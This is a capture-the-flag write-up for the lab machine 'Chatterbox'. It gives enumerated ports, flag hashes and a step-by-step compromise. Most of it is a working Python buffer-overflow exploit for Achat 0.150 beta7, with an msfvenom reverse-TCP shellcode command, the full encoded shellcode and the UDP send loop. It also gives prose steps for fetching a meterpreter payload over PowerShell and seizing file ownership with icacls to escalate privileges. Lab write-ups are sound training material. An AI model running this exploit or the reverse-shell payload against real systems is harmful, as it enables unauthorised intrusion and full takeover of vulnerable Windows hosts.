Links

Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows
IP: 10.10.10.74
User: 72290246dfaedb1e3e3ac9d6fb306334
Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon
9256/tcp open -

Vulnerability Exploited:

Achat Remote Buffer Overflow.
https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

Icacls on root.txt allows current user to read any file owned by the administrator.

Exploiting the host:

Nmap took too long so I used Sparta on this one:
Revealed port 9255 & 9256 open.
Googling the port gave us Achat
That is a really buggy metasploit exploit so we found a better one online:
https://www.exploit-db.com/exploits/36025/
Generate your shellcode
Paste that into the script so it looks as follows:
#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"
# Create a UDP socket - Change this host!!!
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
Execute
Now you have a shell
Upgrade your shell to meterpreter as it is windows 7 we will use powershell to download it.
Generate a shell with msfvenom
Start your python web server and a metasploit listener
Download the file with the following commands and execute it.
Now you have a meterpreter shell
Enumerating the system show you that you can access the administrators desktop but cannot read the file.
Use the following command to assign ownership to alfred and collect the root flag.